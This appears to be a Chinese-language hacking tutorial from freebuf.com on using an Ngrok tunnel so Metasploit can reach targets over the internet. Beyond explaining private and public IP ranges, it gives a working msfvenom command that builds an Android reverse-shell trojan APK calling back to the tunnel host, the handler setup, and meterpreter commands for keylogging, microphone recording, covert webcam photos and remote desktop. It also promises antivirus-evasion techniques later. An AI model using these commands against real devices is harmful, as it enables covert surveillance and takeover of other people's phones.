经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面进行渗透主机呢?……
这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么?这里我给大家普及一下吧!
什么是内网?内网接入方式:上网的计算机得到的IP地址是Inetnet上的保留地址,保留地址有如下3种形式:10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x内网的计算机以NAT(网络地址转换)协议,通过一个公共的网关访问Internet。内网的计算机可Internet上的其他计算机发送连接请求,但Internet上其他的计算机无法向内网的计算机发送连接请求。
什么是外网(也称为公网)?使用ADSL的用户,如果只有一个用户一台计算机在使用此宽带,没有使用路由功能,而是用拨号软件直接拨号上网的,这种情况下,该用户目前所处的网络为外网,外网的用户都拥有一个属于自己的独立IP地址.公网的计算机和Internet上的其他计算机可随意互相访问。
如何判断你是网络是内网还是外网呢?输入WIN+R进去MS-DOS命令行里面,输入:ipconfig看一下自己的ip:如果你的IP地址属于保留地址(保留地址开头为:10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x)那么你的计算机就是运行在局域网内。
今天给大家介绍一个简单方法让metsploit连入外网的方式,使用一个内网穿透工具Ngrok。
打开网址:https://www.ngrok.cc然后注册账号登录。选择一个免费的隧道:
据图配置
本地端口,如果是kali我们需要输入ifconfig看一下自己的ip填进去。
然后找到自己刚刚开通的隧道,看一下自己的配置信息,这里的隧道id和隧道端口,服务器地址接下来要用的:
下载自己对应的客户端,我用的是kali Linux所以选择了一个64位的Linux版本的。
下载之后你自己找一个目录放进去,然后在终端打开这个指定目录并输入命令:./sunny clientid 隧道id
出现下面的转发成功界面就OK了(服务器地址和ip地址被我打码了,你们的电脑上可以看到的)。
连上外网之后的metsploit做渗透测试的时候就如鱼得水了。比如你在局域网里面想要渗透一个手机。需要让手机和电脑连在一个WiFi上面,但是现在就不需要了。
下面给大家来一个简单尝试吧。
打开metsploit控制台,输入下面的命令生成一个安卓木马(这是最简单最基础的生成方式了)
msfvenom –p android/meterpreter/reverse_tcp LHOST=刚才创建的隧道服务器地址 LPORT=隧道端口 R >/root/muma.apk
安装到自己的手机上,不要问为啥报毒!它就是一个简单的病毒!
(免杀不是简单重点,以后会讲免杀技术)。
接下来输入下面的命令:(一句一句的输入)
use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //选择Payload
show options //查看参数配置ip:这里的ip是kali本机的,和端口是刚才ngrok里自定义的本地端口。
最后如何exploit
安卓机点一点病毒,就连上了,完全不用在同一局域网下面,手机用自己的4G网即可。
接下来就可以操控手机了。
keyscan_start:开始键盘记录
keyscan_dump:下载键盘记录
keyscan_stop:结束键盘记录
record_mic:录制声音(如果目标主机上有话筒的话)
webcam_chat:查看摄像头接口
webcam_list:查看摄像头列表
webcam_stream:获取摄像头视频
run vnc:开启远程桌面webcam_stream 开启摄像头
webcam_snap 隐秘拍照功能 -i 1 或者2是开启前置摄像头和后置摄像头的
来源:freebuf.com 2019-03-16 16:39:35 by: 酷黑族kuheizu
请登录后发表评论
注册